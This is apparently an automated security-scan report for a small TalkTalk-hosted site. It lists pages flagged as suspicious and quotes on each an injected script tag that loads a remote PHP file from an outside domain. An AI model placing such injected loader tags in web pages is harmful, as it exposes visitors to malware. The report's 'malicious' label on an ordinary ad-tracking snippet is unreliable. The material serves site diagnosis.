Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=potstove.talktalk.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.potstove.talktalk.net/ | 200 OK Content-Length: 2395 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245915"></script> | ||
http://www.potstove.talktalk.net/contact.htm | 200 OK Content-Length: 2140 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245912"></script> | ||
http://www.potstove.talktalk.net/index.htm | 200 OK Content-Length: 2395 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245915"></script> | ||
http://www.potstove.talktalk.net/diary.htm | 200 OK Content-Length: 3408 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245913"></script> | ||
http://www.potstove.talktalk.net/folk.htm | 200 OK Content-Length: 14586 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5245914"></script> | ||
http://www.potstove.talktalk.net/../martin.nail/Folkmus.htm | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 00:24:23 GMT Location: http://www.talktalk.co.uk/ Server: Apache Content-Length: 210 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.talktalk.co.uk/ | HTTP/1.1 302 Found Connection: close Date: Mon, 02 Mar 2015 00:24:24 GMT Location: http://sales.talktalk.co.uk/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: vCnt[hp]=1; expires=Tue, 01-Mar-2016 00:24:24 GMT Set-Cookie: COOKIETEST=1; domain=.tiscali.co.uk Set-Cookie: tiscalicustomsettings=colscheme%3D%26fontsize%3D%26group%3Dh18%26hpswitched%3D%26hpvisits%3D1%26hponnet%3D%26textonly%3D; expires=Tue, 01-Mar-2016 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: ADRUM_BT=R%3A0%7CclientRequestGUID%3A585cc745-6bf8-4ade-bcb4-9e9aa2c883b38001; expires=Mon, 02-Mar-2015 00:24:54 GMT; path=/ | clean |
http://sales.talktalk.co.uk/ | HTTP/1.1 302 Found Cache-Control: private, must-revalidate, max-age=0 Connection: close Date: Mon, 02 Mar 2015 00:24:24 GMT Pragma: no-cache Location: https://sales.talktalk.co.uk/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: sid=53om8svknjrng4ss7vg73endg292jfd4vql69ufq43tbunrd75a0; path=/; HttpOnly Set-Cookie: tiscalicustomsettings=colscheme%3D%26fontsize%3D%26group%3Dh18%26hpswitched%3D%26hpvisits%3D%26hponnet%3D%26textonly%3D; expires=Tue, 01-Mar-2016 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: portalId=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ Set-Cookie: portalId=TALKTALK; expires=Wed, 01-Apr-2015 00:24:24 GMT; path=/; domain=.talktalk.co.uk Set-Cookie: branchId=1231; expires=Wed, 01-Apr-2015 00:24:24 GMT; path=/ Set-Cookie: agentId=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/ | clean |
https://sales.talktalk.co.uk/ | 200 OK Content-Length: 191519 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<iframe src="https://4255905.fls.doubleclick.net/activityi;src=4255905;type=tt-home;cat=talkt976;ord=' + a + '?" width="1" height="1" frameborder="0" style="display:none"></iframe>'); Antivirus reports:
| ||
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/myaccount/main.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/core-js-2014-09-12.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/core-sales-js-2012-05-21.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/header-core-javascript-20121207.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m1.ttxm.co.uk/scripts/tt_tooltipWithIcon.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/tagcanvas.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/appdyn/adrum-sales.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//d3c3cq33003psk.cloudfront.net/opentag-30671-1060797.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
https://sales.talktalk.co.uk//m0.ttxm.co.uk/scripts/webtagging-2014-02-13.js/ | 404 Not Found Content-Length: 39056 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: potstove.talktalk.net
Result:
GET / HTTP/1.1
Host: potstove.talktalk.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: potstove.talktalk.net
Referer: http://www.google.com/search?q=potstove.talktalk.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: potstove.talktalk.net
Referer: http://www.google.com/search?q=potstove.talktalk.net
Result:
The result is similar to the first query. There are no suspicious redirects found.